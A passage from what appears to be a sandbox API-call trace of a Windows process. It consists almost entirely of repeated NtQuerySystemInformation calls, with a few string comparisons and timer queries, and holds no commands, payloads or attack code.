(SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0283.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0283.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0283.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce60, Length=0x38, ResultLength=0x0) [0283.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x20, ResultLength=0x0) [0283.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x20, ResultLength=0x0) [0283.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x20, ResultLength=0x0) [0283.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x50, ResultLength=0x0) [0283.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x38, ResultLength=0x0) [0283.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x28, ResultLength=0x0) [0283.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x28, ResultLength=0x0) [0283.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x28, ResultLength=0x0) [0283.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x28, ResultLength=0x0) [0283.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x28, ResultLength=0x0) [0283.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x38, ResultLength=0x0) [0283.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x28, ResultLength=0x0) [0283.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x28, ResultLength=0x0) [0283.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x38, ResultLength=0x0) [0283.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x20, ResultLength=0x0) [0283.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x20, ResultLength=0x0) [0283.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x20, ResultLength=0x0) [0283.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x20, ResultLength=0x0) [0283.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x38, ResultLength=0x0) [0283.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x20, ResultLength=0x0) [0283.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x20, ResultLength=0x0) [0283.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x20, ResultLength=0x0) [0283.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.138] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0283.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdc8, Length=0x50, ResultLength=0x0) [0283.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccf0, Length=0x38, ResultLength=0x0) [0283.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x28, ResultLength=0x0) [0283.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x28, ResultLength=0x0) [0283.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x28, ResultLength=0x0) [0283.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x28, ResultLength=0x0) [0283.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccf0, Length=0x38, ResultLength=0x0) [0283.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0283.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0283.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccf0, Length=0x38, ResultLength=0x0) [0283.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb70, Length=0x20, ResultLength=0x0) [0283.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0283.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0283.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0283.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccf0, Length=0x38, ResultLength=0x0) [0283.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb70, Length=0x20, ResultLength=0x0) [0283.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x20, ResultLength=0x0) [0283.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x20, ResultLength=0x0) [0283.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0d8, Length=0x50, ResultLength=0x0) [0283.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d050, Length=0x28, ResultLength=0x0) [0283.152] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0283.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0d8, Length=0x50, ResultLength=0x0) [0283.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0d8, Length=0x50, ResultLength=0x0) [0283.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfc0, Length=0x50, ResultLength=0x0) [0283.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0283.153] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0283.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfc0, Length=0x50, ResultLength=0x0) [0283.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfc0, Length=0x50, ResultLength=0x0) [0283.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfc0, Length=0x50, ResultLength=0x0) [0283.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cef0, Length=0x38, ResultLength=0x0) [0283.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x28, ResultLength=0x0) [0283.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x28, ResultLength=0x0) [0283.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x28, ResultLength=0x0) [0283.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd90, Length=0x28, ResultLength=0x0) [0283.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cef0, Length=0x38, ResultLength=0x0) [0283.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce10, Length=0x28, ResultLength=0x0) [0283.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce10, Length=0x28, ResultLength=0x0) [0283.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cef0, Length=0x38, ResultLength=0x0) [0283.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd70, Length=0x20, ResultLength=0x0) [0283.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccf0, Length=0x20, ResultLength=0x0) [0283.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccf0, Length=0x20, ResultLength=0x0) [0283.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccf0, Length=0x20, ResultLength=0x0) [0283.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cef0, Length=0x38, ResultLength=0x0) [0283.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd70, Length=0x20, ResultLength=0x0) [0283.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x20, ResultLength=0x0) [0283.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x20, ResultLength=0x0) [0283.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.169] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xa78207d020 | out: lpSystemTimeAsFileTime=0xa78207d020*(dwLowDateTime=0x361e20d9, dwHighDateTime=0x1d6666a)) [0283.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0d8, Length=0x50, ResultLength=0x0) [0283.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d010, Length=0x28, ResultLength=0x0) [0283.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf28, Length=0x50, ResultLength=0x0) [0283.169] GetTickCount () returned 0x1186d9c [0283.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdf8, Length=0x58, ResultLength=0x0) [0283.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x38, ResultLength=0x0) [0283.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x28, ResultLength=0x0) [0283.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x28, ResultLength=0x0) [0283.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x28, ResultLength=0x0) [0283.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x28, ResultLength=0x0) [0283.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x28, ResultLength=0x0) [0283.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x38, ResultLength=0x0) [0283.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x28, ResultLength=0x0) [0283.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x28, ResultLength=0x0) [0283.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x38, ResultLength=0x0) [0283.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x20, ResultLength=0x0) [0283.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x20, ResultLength=0x0) [0283.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) 